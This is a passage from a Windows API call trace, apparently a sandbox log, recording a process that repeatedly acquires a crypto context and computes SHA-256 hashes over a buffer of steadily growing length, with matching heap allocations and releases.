	[0118.500] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.501] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.501] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0118.501] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb5c8
	[0118.501] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb5c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb5c8, pdwDataLen=0x129364) returned 1
	[0118.501] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.501] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.501] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.501] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.501] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0118.501] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb5f0
	[0118.501] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb5f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb5f0, pdwDataLen=0x129364) returned 1
	[0118.501] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.501] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.501] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.502] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.502] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0118.502] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb618
	[0118.502] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb618, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb618, pdwDataLen=0x129364) returned 1
	[0118.502] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.502] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.502] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.502] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.502] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0118.502] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb640
	[0118.502] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb640, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb640, pdwDataLen=0x129364) returned 1
	[0118.502] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.502] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.502] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.503] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.503] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0118.503] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb668
	[0118.503] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb668, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb668, pdwDataLen=0x129364) returned 1
	[0118.503] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.503] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.503] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.503] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.503] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0118.503] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb690
	[0118.503] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb690, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb690, pdwDataLen=0x129364) returned 1
	[0118.503] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.503] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.503] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.504] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.504] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0118.504] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb6b8
	[0118.504] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb6b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb6b8, pdwDataLen=0x129364) returned 1
	[0118.504] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.504] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.504] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.504] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.504] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0118.504] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb6e0
	[0118.504] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb6e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb6e0, pdwDataLen=0x129364) returned 1
	[0118.504] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.504] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.504] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.505] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.505] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0118.505] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb708
	[0118.505] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb708, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb708, pdwDataLen=0x129364) returned 1
	[0118.505] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.505] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.505] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b6770) returned 1
	[0118.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x26b6770
	[0118.505] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.505] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.505] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0118.505] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb730
	[0118.505] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb730, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb730, pdwDataLen=0x129364) returned 1
	[0118.505] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.505] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.505] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.506] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.506] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0118.506] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb758
	[0118.506] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb758, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb758, pdwDataLen=0x129364) returned 1
	[0118.506] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.506] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.506] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.506] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.506] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0118.506] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb780
	[0118.506] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb780, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb780, pdwDataLen=0x129364) returned 1
	[0118.506] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.506] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.506] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.507] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.507] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0118.507] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb7a8
	[0118.507] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb7a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb7a8, pdwDataLen=0x129364) returned 1
	[0118.507] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.507] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.507] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.507] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.507] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0118.507] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb7d0
	[0118.507] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb7d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb7d0, pdwDataLen=0x129364) returned 1
	[0118.507] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.507] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.507] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.508] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.508] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0118.508] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb7f8
	[0118.508] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb7f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb7f8, pdwDataLen=0x129364) returned 1
	[0118.508] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.508] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.508] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.508] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.508] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0118.508] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb820
	[0118.508] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb820, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb820, pdwDataLen=0x129364) returned 1
	[0118.508] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.508] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.508] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.509] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.509] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0118.509] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb848
	[0118.509] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb848, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb848, pdwDataLen=0x129364) returned 1
	[0118.509] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.509] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.509] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.509] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.509] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0118.509] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb870
	[0118.509] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb870, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb870, pdwDataLen=0x129364) returned 1
	[0118.509] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.509] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.509] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.510] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.510] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0118.510] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb898
	[0118.510] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb898, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb898, pdwDataLen=0x129364) returned 1
	[0118.510] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.510] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.510] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.510] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.510] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0118.510] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb8c0
	[0118.510] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb8c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb8c0, pdwDataLen=0x129364) returned 1
	[0118.510] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.510] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.510] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.511] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.511] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0118.511] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb8e8
	[0118.511] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb8e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb8e8, pdwDataLen=0x129364) returned 1
	[0118.511] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.511] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.511] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.511] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.511] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0118.511] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb910
	[0118.511] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb910, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb910, pdwDataLen=0x129364) returned 1
	[0118.511] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.511] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.511] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.512] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.512] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0118.512] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.512] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb938
	[0118.512] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb938, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb938, pdwDataLen=0x129364) returned 1
	[0118.512] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.512] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.512] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.512] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.512] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0118.512] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.512] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb960
	[0118.512] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb960, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb960, pdwDataLen=0x129364) returned 1
	[0118.512] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.512] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.512] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.513] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.513] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0118.513] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb988
	[0118.513] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb988, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb988, pdwDataLen=0x129364) returned 1
	[0118.513] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.513] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.513] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.513] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.513] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0118.513] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb9b0
